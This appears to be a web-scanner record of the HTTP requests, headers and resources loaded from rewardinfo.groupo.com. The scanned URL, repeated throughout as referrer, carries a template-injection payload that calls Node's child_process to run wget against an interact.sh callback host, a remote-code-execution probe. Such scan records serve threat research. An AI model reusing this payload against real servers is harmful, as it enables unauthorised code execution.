Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Transfer-Encoding
chunked
Connection
keep-alive
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
jquery-ui.js
rewardinfo.groupo.com/scripts/ 		470 KB
155 KB 		Script
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/scripts/jquery-ui.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
e049d2f122ce513df16dd5853a6a8201b79e9c27939b78613b44cec472731ba6
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Transfer-Encoding
chunked
Connection
keep-alive
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
popper.min.js
rewardinfo.groupo.com/scripts/ 		19 KB
9 KB 		Script
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/scripts/popper.min.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
c381a4b7597b44e301fa045f6917e52a714d5bdb583e8744f8029d80ec7985ec
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
8861
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
bootstrap.min.js
rewardinfo.groupo.com/scripts/ 		62 KB
21 KB 		Script
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/scripts/bootstrap.min.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
a4555d8dee9f8adc976e84a97dfe87e6bf5794b579f49bb56f133fed85f7d709
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
21390
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
ai.0.js
az416426.vo.msecnd.net/scripts/a/ 		0
0
attglobe.png
rewardinfo.groupo.com/Content/images/ 		3 KB
3 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/attglobe.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/Content/Site.css
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
d47cf9f8fb204daf2c0cf03038385cda1ce0d65f1e4d5f655ee28fafdb4587a0
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/Content/Site.css
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/Content/Site.css
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
2592
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
ATTAleckSans_W_Lt.woff
rewardinfo.groupo.com/Content/fonts/ 		22 KB
23 KB 		Font
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/Content/fonts/ATTAleckSans_W_Lt.woff
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/Content/Site.css
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
e8d5fae41878b2727ab8fb243bc4bf071238077f621e2bc110bff7ca4ffb962e
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Origin
http://rewardinfo.groupo.com
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Cache-Control
no-cache
Referer
http://rewardinfo.groupo.com/Content/Site.css
Connection
keep-alive
Referer
http://rewardinfo.groupo.com/Content/Site.css
Origin
http://rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
font/x-woff
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
22564
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
ATTAleckSans_W_Bd.woff
rewardinfo.groupo.com/Content/fonts/ 		23 KB
23 KB 		Font
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/Content/fonts/ATTAleckSans_W_Bd.woff
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/Content/Site.css
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
f13ffc0adc7e47990e67bcfb8f355a65c29361b12f0f20d5067ac880393685bc
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Origin
http://rewardinfo.groupo.com
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Cache-Control
no-cache
Referer
http://rewardinfo.groupo.com/Content/Site.css
Connection
keep-alive
Referer
http://rewardinfo.groupo.com/Content/Site.css
Origin
http://rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
font/x-woff
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
23052
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
az416426.vo.msecnd.net
URL
https://az416426.vo.msecnd.net/scripts/a/ai.0.js

Verdicts & Comments Add Verdict or Comment

7 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| onbeforexrselect boolean| originAgentCluster object| appInsights function| $ function| jQuery object| bootstrap function| checkWidth

0 Cookies

1 Console Messages

Source Level URL
Text
security error URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//(Line 22)
Message:
Refused to load the script 'https://az416426.vo.msecnd.net/scripts/a/ai.0.js' because it violates the following Content Security Policy directive: "script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback.

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block